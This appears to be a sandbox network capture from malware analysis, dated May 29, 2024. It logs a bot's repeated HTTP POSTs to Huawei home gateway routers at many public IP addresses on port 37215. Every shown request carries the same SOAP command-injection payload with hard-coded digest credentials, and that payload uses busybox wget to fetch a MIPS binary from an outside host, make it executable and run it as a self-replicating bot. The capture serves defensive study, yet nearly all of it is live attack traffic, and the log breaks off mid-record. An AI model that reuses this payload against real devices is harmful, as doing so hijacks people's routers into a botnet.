                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  277192.168.2.1350228157.36.132.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227121115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  278192.168.2.134716841.220.159.2937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227145910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  279192.168.2.133688645.158.218.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227160931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  280192.168.2.1359128197.210.32.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227184057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  281192.168.2.1341296157.10.74.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227200985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  282192.168.2.1360994157.121.221.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227226973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  283192.168.2.1358548197.201.76.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227243900 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  284192.168.2.133504841.40.228.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227266073 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  285192.168.2.13542924.72.239.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227284908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  286192.168.2.135593441.131.243.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.227312088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 